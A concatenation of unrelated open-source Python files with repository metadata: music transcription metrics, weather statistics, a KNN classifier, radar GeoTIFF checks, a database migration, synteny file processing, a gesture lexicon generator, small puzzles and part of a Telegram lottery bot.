        # Offsets are ignored (offset_ratio=None); onsets must match within
        # *tolerance* seconds and pitches within a quarter tone.
        P, R, F, _ = mir_eval.transcription.precision_recall_f1_overlap(
            intervals_ref, notes_ref, intervals_est, notes_est,
            pitch_tolerance=0.25, offset_ratio=None, onset_tolerance=tolerance)
        results += [[F, P, R]]
    return np.mean(np.array(results), axis=0)
def get_best_thresh(inputs, targets, verbose=False):
    """Two-stage grid search for the binarisation threshold maximising F1.

    A coarse pass over [0, 1) in 0.1 steps is refined with a 0.01-step
    search around the coarse optimum.  Returns (best_threshold, best_F).
    """
    def search(candidates):
        # Evaluate F-measure at every candidate threshold; keep the best.
        scores = [Fmeasure((inputs > t).astype(int), targets) for t in candidates]
        best = int(np.argmax(scores))
        return candidates[best], scores[best]
    coarse_thresh, _ = search(np.arange(0, 1, 0.1))
    fine_grid = np.arange(max(0, coarse_thresh - 0.09),
                          min(1, coarse_thresh + 0.095), 0.01)
    best_thresh, best_F = search(fine_grid)
    if verbose:
        print("Best F0 : " + str(best_F))
        print("Best thresh : " + str(best_thresh))
    return best_thresh, best_F
| adrienycart/MLM_decoding | mlm_training/utils.py | utils.py | py | 10,758 | python | en | code | 5 | github-code | 90 |
'''
Given path to training weather data (directory), return mean and std-dev of temperature and PM2.5
Note the weather data covers all districts
Arguments:
1) Directory path to training weather data
Returns a tuple of (temp_mu, temp_sigma, pm25_mu, pm25_sigma)
'''
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import os
def calc_weather_mu_sigma(training_weather_data_path):
    """Return (temp_mu, temp_sigma, pm25_mu, pm25_sigma) over every weather
    file in *training_weather_data_path*.

    Each whitespace-separated line holds the temperature in column 3 and
    the PM2.5 reading in column 4 (0-based).
    """
    # Make sure training data path exists
    assert os.path.exists(training_weather_data_path), 'calc_weather_mu_sigma.py: Training data directory does not exist'
    temps = []
    pm25s = []
    # Accumulate readings from every file in the directory.
    for entry in os.listdir(training_weather_data_path):
        full_path = os.path.join(training_weather_data_path, entry)
        with open(full_path) as handle:
            for record in handle:
                fields = record.split()
                temps.append(float(fields[3]))
                pm25s.append(float(fields[4]))
    return (np.mean(temps), np.std(temps), np.mean(pm25s), np.std(pm25s))
if __name__ == '__main__':
    # Smoke test: print the statistics for the bundled training data set.
    print(calc_weather_mu_sigma('../data/training_data/weather_data'))
| georgesung/ml_competition_didi | preprocess_data/calc_weather_mu_sigma.py | calc_weather_mu_sigma.py | py | 1,437 | python | en | code | 5 | github-code | 90 |
'''
Created_by : Anand Tiwari
Created_At : 20/02/2018
Description : This is the implimnetation of K-NeirestNeighbour Algorithm. I have used MNIST data to
to impliment this algorithm. KNN is both classification and regression algorithm.
In classification, we look on the neirest point and then find which class has more
occurance in those neirest points. In regression, take mean of the neirest points.
In this algorithm fit only stores the input and do nothing all work is done by the
predict. So, it is also called as Lazy Learner. Distance matrix used is Euclidean.
I have used one list(sl1) to store tuple of [(distance, class)]. list contain number of item equal to K.
From that list i had made a dictionary(votes) of {class : number of occurance in the list}.
With this dictionary classification is or prediction is done.
'''
import numpy as np
from utils import get_mnist
from sortedcontainers import SortedList
from datetime import datetime
import matplotlib.pyplot as plt
class KNN(object):
    """k-nearest-neighbour classifier (lazy learner).

    ``fit`` merely stores the training data; all work happens in
    ``predict``, which votes among the k closest training points under
    squared Euclidean distance.
    """
    # Initialise the number of neighbours consulted per prediction.
    def __init__(self, k):
        self.k = k
    # Lazy learner: fit only remembers the training set.
    def fit(self, X, y):
        self.X = X
        self.y = y
    # predict performs the neighbour search and majority vote.
    def predict(self, X):
        predictions = np.zeros(len(X))
        for idx, query in enumerate(X):
            # Keep the k nearest (distance, label) pairs seen so far.
            nearest = SortedList(load = self.k)
            for train_idx, train_point in enumerate(self.X):
                delta = query - train_point
                dist = delta.dot(delta)
                if len(nearest) < self.k:
                    nearest.add((dist, self.y[train_idx]))
                elif dist < nearest[-1][0]:
                    # Closer than the current worst neighbour: replace it.
                    del nearest[-1]
                    nearest.add((dist, self.y[train_idx]))
            # Majority vote among the neighbours' labels; ties go to the
            # label encountered first.
            votes = {}
            for _, label in nearest:
                votes[label] = votes.get(label, 0) + 1
            winner, winner_count = -1, 0
            for label, count in votes.items():
                if count > winner_count:
                    winner_count = count
                    winner = label
            predictions[idx] = winner
        return predictions
    # Fraction of test points classified correctly.
    def score(self, X, y):
        return np.mean(y == self.predict(X))
if __name__ == '__main__':
    # getting the data (NOTE: I have used only 2000 data point.)
    # You can change this
    X, y = get_mnist(2000)
    Ntrain = int(0.7 * len(X))
    # Train and Test splits
    Xtrain, ytrain = X[:Ntrain], y[:Ntrain]
    Xtest, ytest = X[Ntrain:], y[Ntrain:]
    train_score = []
    test_score = []
    # choosing optimal K is difficult
    # I have used K = 1 to 5
    # You can change K as per your requirement
    for k in (1, 2, 3, 4, 5):
        t0 = datetime.now()
        knn = KNN(k)
        knn.fit(Xtrain, ytrain)
        print("Training Time: ", datetime.now() - t0)
        t0 = datetime.now()
        # NOTE(review): score() is called twice per split (once for the
        # print, once for the append); each call re-runs the full
        # O(n_train * n_test) prediction loop.
        print("Training Accuracy: ", knn.score(Xtrain, ytrain))
        print("Time to compute train accuracy :", datetime.now() - t0)
        train_score.append(knn.score(Xtrain, ytrain))
        t0 = datetime.now()
        print("Testing Accuracy: ", knn.score(Xtest, ytest))
        print("Time to compute test accuracy :", datetime.now() - t0)
        test_score.append(knn.score(Xtest, ytest))
        print("\n")
    # plottings
    plt.plot(train_score, label = 'Train Score')
    plt.plot(test_score, label = 'Test Score')
    plt.xlim(1, 6)
    plt.xticks( range(1, 6) )
    plt.legend()
    plt.show()
| AnandTiwari1997/ML-Algorithm-Scratch | KNN_Training_And_Prediction.py | KNN_Training_And_Prediction.py | py | 3,885 | python | en | code | 0 | github-code | 90 |
import argparse
import datetime
import os
import shutil
import subprocess
import sys
import tempfile
import gdal
import numpy as np
from tdm.radar import utils
gdal.UseExceptions()
SpatialReference = gdal.osr.SpatialReference
splitext = os.path.splitext
strftime = datetime.datetime.strftime
strptime = datetime.datetime.strptime
# https://www.awaresystems.be/imaging/tiff/tifftags/datetime.html
TIFF_DT_FMT = "%Y-%m-%d %H:%M:%S"
def compare_gtiff(fn1, fn2):
    """Assert that two GeoTIFFs are equivalent: same geotransform, same
    spatial reference, a single band each, identical masks and band data
    equal to within 1e-4."""
    first, second = gdal.Open(fn1), gdal.Open(fn2)
    assert first.GetGeoTransform() == second.GetGeoTransform()
    ref_a = SpatialReference(wkt=first.GetProjectionRef())
    ref_b = SpatialReference(wkt=second.GetProjectionRef())
    assert ref_a.IsSame(ref_b)
    assert first.RasterCount == second.RasterCount == 1
    masked_a = utils.band_to_ma(first.GetRasterBand(1))
    masked_b = utils.band_to_ma(second.GetRasterBand(1))
    assert np.array_equal(masked_a.mask, masked_b.mask)
    assert np.ma.allclose(masked_a, masked_b, atol=1e-4)
def rm_f(*paths):
    """Delete each path, ignoring ones that do not exist (like ``rm -f``)."""
    from contextlib import suppress
    for p in paths:
        # suppress() is the idiomatic stdlib form of try/except/pass here.
        with suppress(FileNotFoundError):
            os.unlink(p)
def main(args):
    # Re-derive each warped GeoTIFF from the raw PNG radar images and check
    # it matches the previously generated file in gtiff_img_dir.
    dt_path_pairs = utils.get_images(args.png_img_dir)
    ga = utils.GeoAdapter(args.footprint)
    gtiff_map = utils.scan_gtiffs(args.gtiff_img_dir)
    # Every PNG timestamp must have a corresponding GeoTIFF to compare with.
    assert {_[0] for _ in dt_path_pairs}.issubset(gtiff_map)
    wd = tempfile.mkdtemp(prefix="tdm_")
    in_fn = os.path.join(wd, "orig.tif")
    warped_fn = os.path.join(wd, "warped.tif")
    t_srs = "EPSG:4326"
    n_pairs = len(dt_path_pairs)
    for i, (dt, path) in enumerate(dt_path_pairs):
        # Reuse the same two scratch filenames for every image.
        rm_f(in_fn, warped_fn)
        print("checking %s (%d/%d)" % (gtiff_map[dt], i + 1, n_pairs))
        signal = utils.get_image_data(path)
        rain = utils.estimate_rainfall(signal)
        metadata = {"TIFFTAG_DATETIME": strftime(dt, TIFF_DT_FMT)}
        ga.save_as_gtiff(in_fn, rain, metadata)
        # Reproject with the external gdalwarp tool, then compare results.
        subprocess.check_call(["gdalwarp", "-t_srs", t_srs, in_fn, warped_fn])
        compare_gtiff(gtiff_map[dt], warped_fn)
    shutil.rmtree(wd)
if __name__ == "__main__":
    # CLI: PNG directory, GeoTIFF footprint template, and the directory of
    # previously generated warped GeoTIFFs to validate against.
    parser = argparse.ArgumentParser()
    parser.add_argument("png_img_dir", metavar="PNG_IMG_DIR")
    parser.add_argument("footprint", metavar="GEOTIFF_FOOTPRINT")
    parser.add_argument("gtiff_img_dir", metavar="GEOTIFF_IMG_DIR")
    main(parser.parse_args(sys.argv[1:]))
| tdm-project/tdm-tools | tools/check_raw_to_warped.py | check_raw_to_warped.py | py | 2,293 | python | en | code | 0 | github-code | 90 |
"""CM-563 Add full_name to users
Revision ID: f67f1970ee20
Revises: 2163c84d2cc6
Create Date: 2021-05-03 22:20:30.103778
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import mssql
# revision identifiers, used by Alembic.
revision = "f67f1970ee20"
down_revision = "2163c84d2cc6"
branch_labels = None
depends_on = None
def upgrade():
    # ### commands auto generated by Alembic - please adjust! ###
    # Add the NOT NULL users.full_name column (max 50 characters).
    op.add_column("users", sa.Column("full_name", sa.String(length=50), nullable=False))
    # ### end Alembic commands ###
def downgrade():
    # ### commands auto generated by Alembic - please adjust! ###
    # Reverse of upgrade(): drop the users.full_name column.
    op.drop_column("users", "full_name")
    # ### end Alembic commands ###
| ClimateMind/climatemind-backend | migrations/versions/202105032220-f67f1970ee20_cm_563_add_full_name_to_users.py | 202105032220-f67f1970ee20_cm_563_add_full_name_to_users.py | py | 718 | python | en | code | 14 | github-code | 90 |
"""
i-ADHoRe Processing
"""
import glob
import os
import json
import yaml
import pickle
from misc.string import check_folder_path, is_int
def iadhore_family_to_dict(infile):
    """
    Convert i-ADHoRe family to Python dictionary
    :param infile: i-ADHoRe family file (tab-separated ``gene_id<TAB>family_id`` lines)
    :return: Python dictionary Gene ID -> Family ID
    """
    family_dict = dict()
    # Use a context manager so the file handle is always closed
    # (the original opened the file and never closed it).
    with open(infile, 'r') as fin:
        for line in fin:
            key, value = line.strip().split("\t")
            family_dict[key] = value
    return family_dict
def iadhore_list_family_filtering(iadhore_genes_list, iadhore_family_file, outfolder):
    """
    Select only genes that are in the family file
    :param outfolder: Output folder
    :param iadhore_genes_list: i-ADHoRe list
    :param iadhore_family_file: i-ADHoRe family file
    :return:
    """
    iadhore_genes_list = check_folder_path(iadhore_genes_list)
    outfolder = check_folder_path(outfolder, True)
    family_genes = set(iadhore_family_to_dict(iadhore_family_file).keys())
    # Walk every gene-list file; layout is <genes_list>/<species>/<file>.
    for p in glob.glob(iadhore_genes_list + '**/*'):
        if os.path.isfile(p):
            # get set of genes
            # NOTE(review): the [:-1] slicing drops the last character of each
            # line -- presumably an orientation marker (+/-); confirm format.
            list_genes = set()
            fin = open(p, 'r')
            for line in fin.readlines():
                list_genes.add(line.strip()[:-1])
            fin.close()
            # check the difference
            exception_genes = list_genes.difference(family_genes)
            # Only write an output file when at least one gene survives.
            if len(exception_genes) < len(list_genes):
                # Mirror the <species>/<file> structure under *outfolder*.
                sub_outfolder = outfolder + os.path.split(os.path.dirname(p))[-1]
                sub_outfolder = check_folder_path(sub_outfolder, True)
                outfile = sub_outfolder + os.path.basename(p)
                fout = open(outfile, 'w')
                # check infile again
                # Second pass: copy only lines whose gene is in a family.
                fin = open(p, 'r')
                for line in fin.readlines():
                    if line.strip()[:-1] not in exception_genes:
                        fout.write(line)
                fin.close()
                fout.close()
def create_iadhore_config(iadhore_genes_list, iadhore_family_file, iadhore_parameter_file, iadhore_result_folder,
                          outfile):
    """
    Create i-ADHoRe configuration file
    :param iadhore_genes_list: i-ADHoRe genes list (one sub-folder per genome)
    :param iadhore_family_file: i-ADHoRe family file
    :param iadhore_parameter_file: i-ADHoRe parameter file (appended verbatim)
    :param iadhore_result_folder: i-ADHoRe result folder
    :param outfile: i-ADHoRe configuration file
    :return:
    """
    # Group chromosome list files by genome (the parent directory name).
    # setdefault replaces the original's duplicated if/else append branches.
    chromosome_dict = dict()
    for g in glob.glob(iadhore_genes_list + '**/*'):
        if os.path.isfile(g):
            species = g.split('/')[-2]
            chromosome_dict.setdefault(species, []).append(g)
    # Context manager guarantees the config file is closed on any error.
    with open(outfile, 'w') as fout:
        # One "genome=" section per species listing its chromosome files.
        for key in chromosome_dict.keys():
            fout.write('genome=' + key + '\n')
            for val in chromosome_dict[key]:
                chromosome = os.path.basename(val).split('.')[0]
                fout.write(chromosome + ' ' + val + '\n')
            fout.write('\n')
        iadhore_result_folder = check_folder_path(iadhore_result_folder, True)
        fout.write('output_path=' + iadhore_result_folder + '\n')
        fout.write('blast_table=' + iadhore_family_file + '\n')
        fout.write('table_type=family\n')
        # Append the raw parameter file contents verbatim.
        with open(iadhore_parameter_file, 'r') as fin:
            for line in fin:
                fout.write(line)
def iadhore_result_file_to_dict(infile):
    """
    Convert i-ADHoRe result file (multiplicons.txt, segments.txt, list_elements.txt to dict)
    :param infile: i-ADHoRe result file (tab-separated with a header row)
    :return: dictionary keyed by the first column; each value maps header
        attribute name -> value for the remaining columns
    """
    with open(infile, 'r') as fin:
        lines = fin.readlines()
    header = lines[0].strip().split("\t")
    results = dict()
    # is_int() converts numeric strings to int and leaves other text alone.
    for row in lines[1:]:
        columns = row.strip().split("\t")
        attributes = {header[pos]: is_int(columns[pos])
                      for pos in range(1, len(columns))}
        results[is_int(columns[0])] = attributes
    return results
def merge_iadhore_file_dict(parent, child, parent_key_in_child, child_key_in_parent):
    """
    Merge 2 i-ADHoRe dictionaries loaded from i-ADHoRe output files.

    Every parent record gains a *child_key_in_parent* sub-dict holding the
    child records whose *parent_key_in_child* field references it; that
    back-reference field is then deleted from the attached child records
    (the child records themselves are mutated).

    :param parent: Parent dictionary
    :param child: Child dictionary
    :param parent_key_in_child: Parent key in child dictionary
    :param child_key_in_parent: Child key in parent dictionary
    :return: Merged dictionary (the same object as *parent*)
    """
    # Attach matching child records under each parent.
    for parent_id, parent_record in parent.items():
        matches = {child_id: child_record
                   for child_id, child_record in child.items()
                   if child_record[parent_key_in_child] == parent_id}
        parent_record[child_key_in_parent] = matches
    # Drop the now-redundant back-reference from every attached child.
    for parent_record in parent.values():
        for child_record in parent_record[child_key_in_parent].values():
            del child_record[parent_key_in_child]
    return parent
def iadhore_result_folder_to_dict(infolder):
    """
    i-ADHoRe output folder to Python dictionary
    :param infolder: i-ADHoRe output folder (must contain multiplicons.txt,
        segments.txt and list_elements.txt)
    :return: nested dictionary multiplicon -> segments -> elements
    """
    infolder = check_folder_path(infolder)
    # Load the three flat result tables.
    multiplicons = iadhore_result_file_to_dict(infolder + 'multiplicons.txt')
    segments = iadhore_result_file_to_dict(infolder + 'segments.txt')
    elements = iadhore_result_file_to_dict(infolder + 'list_elements.txt')
    # Nest elements under their segment, then segments under their multiplicon.
    segments = merge_iadhore_file_dict(segments, elements, "segment", "elements")
    return merge_iadhore_file_dict(multiplicons, segments, "multiplicon", "segments")
def get_complete_synteny_dict(input_dictionary):
    """
    Filter i-ADHoRe output folder dictionary by selecting only those which have orthologous in all species
    :param input_dictionary: i-ADHoRe output folder dictionary
    :return: filtered dictionary; kept multiplicons are trimmed to the
        element positions shared by every one of their segments
    """
    # Collect the full set of genomes seen anywhere in the input.
    genomes = set()
    for value in input_dictionary.values():
        for v in value["segments"].values():
            genomes.add(v["genome"])
    number_of_genomes = len(genomes)
    complete_synteny_dict = dict()
    for key, value in input_dictionary.items():
        # Must have exactly one segment per genome...
        if len(value["segments"]) != number_of_genomes:
            continue
        # ...and those segments must cover every distinct genome.
        genomes_in_segment = set()
        for v in value["segments"].values():
            genomes_in_segment.add(v["genome"])
        number_of_genomes_in_segment = len(genomes_in_segment)
        if number_of_genomes_in_segment != number_of_genomes:
            continue
        # get position intersection
        # NOTE(review): if the running intersection ever becomes empty, the
        # `if not position_intersect` branch re-seeds it from the current
        # segment instead of keeping it empty -- confirm this is intended.
        position_intersect = set()
        for v in value["segments"].values():
            position = set()
            for v0 in v["elements"].values():
                position.add(v0["position"])
            if not position_intersect:
                position_intersect = position
                continue
            position_intersect &= position
        # Rebuild each segment keeping only elements at shared positions.
        new_segments = dict()
        for k, v in value["segments"].items():
            new_elements = dict()
            for k0, v0 in v["elements"].items():
                if v0["position"] in position_intersect:
                    new_elements[k0] = v0
            new_segments[k] = v
            new_segments[k]["elements"] = new_elements
        complete_synteny_dict[key] = value
        complete_synteny_dict[key]["segments"] = new_segments
    return complete_synteny_dict
def iadhore_result_to_serial(infolder, outfile, ftype="json", complete=False):
    """
    Convert i-ADHoRe output to data serialization file
    :param complete: Complete synteny, i.e., which has orthologous group in all species
    :param ftype: Type of the output file: "json", "yaml" or "pickle"
    :param infolder: i-ADHoRe output folder
    :param outfile: Data serialization file
    :return:
    """
    serial_dict = iadhore_result_folder_to_dict(infolder)
    if complete:
        serial_dict = get_complete_synteny_dict(serial_dict)
    # Open in the correct mode up front: the original opened the file in
    # text mode, then closed and re-opened it in binary mode for pickle.
    if ftype == "pickle":
        with open(outfile, 'wb') as fout:
            pickle.dump(serial_dict, fout)
    else:
        # An unknown ftype still truncates/creates an empty file, matching
        # the original behaviour.
        with open(outfile, 'w') as fout:
            if ftype == "json":
                json.dump(serial_dict, fout, indent=5)
            elif ftype == "yaml":
                yaml.dump(serial_dict, fout)
| ihsanmuchsin/MoSyn | prep/iadhore.py | iadhore.py | py | 8,586 | python | en | code | 0 | github-code | 90 |
import datetime
from typing import List, Dict
import bs4
import re
fmt = "%Y年%m月%d日"
def _parse_fund(data: List[str]) -> Dict:
    """Parse a fund history row: [date, share value, total value]."""
    trade_date = datetime.datetime.strptime(data[0], fmt).date()
    return {
        "date": trade_date,
        "share_value": float(data[1]),
        "total_value": float(data[2]),
    }
def _parse_index(data: List[str]) -> Dict:
    """Parse an index history row: [date, open, high, low, close]."""
    open_v, high_v, low_v, close_v = (float(v) for v in data[1:5])
    return {
        "date": datetime.datetime.strptime(data[0], fmt).date(),
        "open_v": open_v,
        "high_v": high_v,
        "low_v": low_v,
        "close_v": close_v,
    }
def _parse_stock(data: List[str]) -> Dict:
    """Parse a stock history row:
    [date, open, high, low, close, volume, adjusted close]."""
    keys = ("open_v", "high_v", "low_v", "close_v", "volume", "final_v")
    record = {"date": datetime.datetime.strptime(data[0], fmt).date()}
    record.update((k, float(v)) for k, v in zip(keys, data[1:7]))
    return record
def _parse_stock_division(data: List[str]) -> Dict:
    """Parse a stock-split row (e.g. '分割: 1株 -> 2株') into a division record."""
    matched = re.search(u"分割: (.+)株 -> (.+)株", data[1])
    before, after = matched.group(1), matched.group(2)
    return {
        "date": datetime.datetime.strptime(data[0], fmt).date(),
        "division": "division",
        "division_from": float(before),
        "division_to": float(after),
    }
def parse_json(json_data) -> bool:
    """Yield daily price records from a Yahoo Finance JSON price history.

    Generator: returns True (as the generator's return value) when the
    history is empty, otherwise False after yielding every row.  Split
    events are handled separately by parse_json_split(); a dead, unused
    read of ``splitHistories`` was removed from this function.
    """
    if "priceHistory" in json_data:
        json_data = json_data["priceHistory"]
    data_rows = json_data["history"]["histories"]
    if len(data_rows) == 0:
        return True
    for row in data_rows:
        # Strip thousands separators before numeric conversion.
        yield {
            "date": datetime.datetime.strptime(row["baseDate"], fmt).date(),
            "open_v": float(row["openPrice"].replace(",", "")),
            "high_v": float(row["highPrice"].replace(",", "")),
            "low_v": float(row["lowPrice"].replace(",", "")),
            "close_v": float(row["closePrice"].replace(",", "")),
            "volume": float(row["volume"].replace(",", "")),
            "final_v": float(row["adjustedClosePrice"].replace(",", "")),
        }
    return False
def parse_json_of_future(json_data) -> bool:
    """Yield daily OHLC records from a futures price-history JSON payload."""
    rows = json_data["histories"]
    if len(rows) == 0:
        return True
    field_map = (("open_v", "openPrice"), ("high_v", "highPrice"),
                 ("low_v", "lowPrice"), ("close_v", "closePrice"))
    for row in rows:
        record = {"date": datetime.datetime.strptime(row["date"], fmt).date()}
        for out_key, in_key in field_map:
            # Drop thousands separators before conversion.
            record[out_key] = float(row[in_key].replace(",", ""))
        yield record
    return False
def parse_json_split(json_data):
    """Yield stock-split events (date and from/to ratio) from a price
    history JSON payload; yields nothing when no splits are present."""
    if "priceHistory" in json_data:
        json_data = json_data["priceHistory"]
    history = json_data["history"]
    if "splitHistories" not in history:
        return
    for split in history["splitHistories"]:
        yield {
            "date": datetime.datetime.strptime(split["splitDate"], fmt).date(),
            "division": "division",
            "division_from": float(1),
            "division_to": float(split["splitRate"].replace(",", "")),
        }
def parse_html(html_soup: bs4.BeautifulSoup) -> bool:
    """Parse a Yahoo Finance Japan price-history table.

    Yields one record per data row; the header's column count selects the
    row parser (3 = fund, 5 = index, >5 = stock).  Two-column rows are
    stock-split events.  Returns True when the table has no data rows,
    False otherwise.
    """
    table = html_soup.find("table", {"class": "boardFin yjSt marB6"})
    table_rows = table.find_all("tr")
    header = table_rows[0]
    data_rows = table_rows[1:]
    if len(data_rows) == 0:
        return True
    # The header's <th> count decides which row parser applies.
    n_cols = len(header.find_all("th"))
    if n_cols == 3:
        _parse_f = _parse_fund
    elif n_cols == 5:
        _parse_f = _parse_index
    elif n_cols > 5:
        _parse_f = _parse_stock
    else:
        raise ValueError("invalid table, n_cols = {}".format(n_cols))
    for row in data_rows:
        # Strip thousands separators before numeric parsing.
        data = [t.text.replace(",", "") for t in row.find_all("td")]
        if len(data) == 2:
            # Two-column rows announce a stock split rather than prices.
            yield _parse_stock_division(data)
        else:
            try:
                yield _parse_f(data)
            except Exception as e:
                # NOTE(review): malformed rows are printed and skipped, not
                # re-raised -- confirm this best-effort behaviour is intended.
                print("Error occured", e)
    return False
| fx-kirin/yfjpscraper | yfjpscraper/parser.py | parser.py | py | 4,026 | python | en | code | 2 | github-code | 90 |
# -*- coding: utf-8 -*-
"""
Created on Thu Feb 6 21:19:13 2020
@author: aniru
"""
# Print a star pattern of height n read from stdin ("A"-shaped, per the
# original file name): two diagonals meeting at the top, a crossbar across
# the interior of the middle row, and two vertical legs below it.
n=int(input())
k=0
t=0
for i in range(1,n+1):
    # t is the centre column/row index (apex position); recomputed each
    # iteration although it only depends on n.
    if n%2==0:
        t=n//2
    else:
        t=(n//2)+1
    for j in range(1,n+1):
        # Left diagonal, right diagonal, crossbar row (interior columns
        # only), or the two legs below the crossbar.
        if j==t-i+1 or j==t+i-1 or i==t and j>1 and j<n or i>t and (j==1 or j==n):
            print("*",end="")
        else:
            print(" ",end='')
    print("\n",end='')
def ngramsout(gesseq):
    """Write a unigram ARPA language model ('task.arpabo') listing every
    non-silence gesture with a fixed log-probability of -1."""
    entries = sorted({'-1 %s' % name for name, *_ in gesseq if name != '<SIL>'})
    entries += ['-99 <s>', '-1 </s>']
    body = '\n'.join(entries)
    with open('task.arpabo', 'w') as f:
        f.write('\\data\\\n')
        f.write('ngram 1=%d\n' % len(entries))
        f.write('\n\\1-grams:\n\n')
        f.write(body)
        f.write('\n\n\\end\\\n')
def phonesout(gesseq):
    """Write the sorted set of phones used by any gesture to 'phones.txt'."""
    unique_phones = {phone for gesture in gesseq for phone in gesture[1:]}
    with open('phones.txt', 'w') as f:
        f.write('\n'.join(sorted(unique_phones)))
def lexiconout(gesseq):
    """Write 'lexicon.txt' (all gestures) and 'lexicon_nosil.txt' (without
    the silence entry), one 'name phone phone ...' line per gesture."""
    all_lines = [' '.join(gesture) for gesture in gesseq]
    with open('lexicon.txt', 'w') as f:
        f.write('\n'.join(all_lines))
        f.write('\n')
    nosil_lines = [' '.join(gesture) for gesture in gesseq
                   if gesture[0] != '<SIL>']
    with open('lexicon_nosil.txt', 'w') as f:
        f.write('\n'.join(nosil_lines))
        f.write('\n')
def generateall():
    """Build the full gesture inventory as (name, phone, phone, ...) tuples:
    silence, long-press, hush, 1-3 clicks, and clockwise/counter-clockwise
    swipes of every length (1-12) from every start position (0-11)."""
    inventory = [
        ('<SIL>', 'SIL'),
        ('LongPress', 'longmid'),
        ('Hush', 'all')]
    for clicks in range(1, 4):
        inventory.append(('Click%d' % clicks, *(['shortmid'] * clicks)))
    for length in range(1, 13):
        for origin in range(12):
            # A swipe of `length` steps touches length+1 clock positions,
            # wrapping modulo 12 in either direction.
            cw = ['short%d' % ((origin + step) % 12) for step in range(length + 1)]
            ccw = ['short%d' % ((origin - step) % 12) for step in range(length + 1)]
            inventory.append(('Clockwise%d' % length, *cw))
            inventory.append(('CounterClockwise%d' % length, *ccw))
    return inventory
def main():
    # Generate every gesture, optionally filter the inventory, then write
    # the Kaldi inputs: lexicon files, phone list, and unigram ARPA model.
    gesseq = generateall()
    # Leftover experiment toggles: uncomment a line below to restrict the
    # inventory.  NOTE(review): ex_field is a plain string, not a 1-tuple,
    # so `ges[0] not in ex_field` would do substring matching if enabled.
    filter_field = ('<SIL>', 'Hush', 'Click1', 'Click2', 'Click3', 'LongPress')
    ex_field = ('LongPress')
    #gesseq = [ges for ges in gesseq if ges[0] in filter_field]
    #gesseq = [ges for ges in gesseq if ges[0] not in ex_field]
    lexiconout(gesseq)
    phonesout(gesseq)
    ngramsout(gesseq)
if __name__ == '__main__':
    main()
| FredWe/touch_project | kaldi/touch-project/s5/local/prepare_dict.py | prepare_dict.py | py | 1,916 | python | en | code | 0 | github-code | 90 |
from itertools import accumulate
# Competitive-programming solution.  Input tokens: N, K, then permutation P
# (move targets) and per-square scores C.  From every starting square, move
# along the permutation between 1 and K times, maximising the accumulated
# score; print the best total.
N, K, *PC = map(int, open(0).read().split())
P, C = [0] + PC[:N], [0] + PC[N:]  # pad index 0 so squares are 1-indexed
ans = float("-inf")
for start in range(1, N + 1):
    # Collect the scores encountered around the cycle containing `start`.
    path = []
    cur = P[start]
    path = [C[start]]
    while cur != start:
        path.append(C[cur])
        cur = P[cur]
    # A[i] = sum of the first i+1 scores along the cycle.
    A = list(accumulate(path))
    q, r = divmod(K, len(path))
    res = 0
    if A[-1] >= 0:
        # Positive full-cycle sum: take as many whole loops as possible,
        # keeping at least one partial pass to choose the best prefix from.
        if r == 0:
            q -= 1
            r += len(path)
        res += A[-1] * q
    elif q >= 1:
        # Non-positive cycle sum but K allows a full loop: any prefix length
        # up to the whole cycle is permitted.
        r = len(path)
    ans = max(ans, res + max(A[:r]))
print(ans)
import io
import os
import json
import time
import random
import hashlib
import chain
import config
import keyboa
def creates_a_hash_of_the_winning_number(num):
    """Commit to the winning number: return the md5 hex digest of
    '<num> <salt>', the random hex salt, and num itself."""
    salt = os.urandom(64).hex()
    payload = '{} {}'.format(num, salt)
    return hashlib.md5(payload.encode()).hexdigest(), salt, num
def add_new_user(user_wallet, user_id): # Register a new user
    """Create a user record (fresh memo, empty bets) keyed by wallet name.

    Returns False when the Telegram id is already registered; otherwise the
    updated user table is written to disk (implicit None return).
    """
    memo = get_new_memo()
    users = json_reader(config.USER_FILE_NAME)
    if check_for_telegram_id(user_id, users):
        return False
    # check_the_user_for_availability is True when the wallet is NOT
    # registered yet.
    if check_the_user_for_availability(user_wallet, users):
        users[user_wallet] = {'memo': memo,
                              'bets': {},
                              'telegram_id': user_id}
    json_writer(users, config.USER_FILE_NAME)
# True means the user does NOT exist yet; False means the user exists.
def check_the_user_for_availability(name, users):
    """Availability check: True when *name* is free (no such user).

    The original for/else scan is equivalent to a plain membership test.
    """
    return name not in users
def check_for_telegram_id(telegram_id, users):
    """Return True if any user record carries this Telegram id.

    Fix: the original fell off the end and returned None for "not found";
    this returns an explicit (still falsy) False.
    """
    return any(x['telegram_id'] == telegram_id for x in users.values())
def get_new_memo():
    """Generate a memo code not yet used by any existing user."""
    while True:
        candidate = os.urandom(4).hex()
        if checking_memo_for_uniqueness(candidate):
            return candidate
def if_text_is_a_number(text: str):
    """Validate a chat message as a bet number.

    Returns True for 1..10000, config.SPAN_OF_NUMBERS for out-of-range
    integers, and False for zero or non-numeric input.
    """
    try:
        value = int(text)
    except (ValueError, TypeError):
        # Fix: was a bare ``except`` that swallowed every exception,
        # including KeyboardInterrupt/SystemExit.
        return False
    if value > 10000 or value < 0:
        return config.SPAN_OF_NUMBERS
    return 0 < value <= 10000
def checking_memo_for_uniqueness(memo):
    """Return True if no existing user already has this memo.

    Replaces the original's confusing for/else scan with an ``all()``
    expression of identical behaviour (True for an empty user table).
    """
    previous = json_reader(config.USER_FILE_NAME)
    return all(x['memo'] != memo for x in previous.values())
def json_writer(data, file_name, encoding='utf8'):
    """Serialise *data* as JSON (non-ASCII kept verbatim) into *file_name*.

    Note: the *encoding* parameter is accepted but unused, matching the
    original signature.
    """
    with io.open(file_name, 'w') as handle:
        json.dump(data, handle, ensure_ascii=False)
def json_reader(file_name):
    """Load and return the JSON document stored in *file_name*."""
    with io.open(file_name, encoding='utf8') as handle:
        return json.load(handle)
def clearing_bets_after_playing(): # Clear all bets after a round
    """Archive the current user table (keyed by timestamp) into the history
    file, then wipe every user's bets and persist the cleaned table."""
    users = json_reader(config.USER_FILE_NAME)
    # Snapshot the table before clearing.
    data = json_reader(config.OLD_USERS_FILE_NAME)
    data[time.time()] = users
    json_writer(data, config.OLD_USERS_FILE_NAME)
    for x in users:
        users[x]['bets'].clear()
    json_writer(users, config.USER_FILE_NAME)
def adding_rate(user_name, bet):
    """Register *bet* for *user_name* unless it was already placed.

    The bet is stored with value False (no deposit transaction attached
    yet).  Returns True on success, False for a duplicate bet.
    """
    users = json_reader(config.USER_FILE_NAME)
    # Membership test replaces the original for/else scan over bet keys.
    # Note: duplicates are detected against str(bet) while the new key is
    # stored as-is, matching the original behaviour.
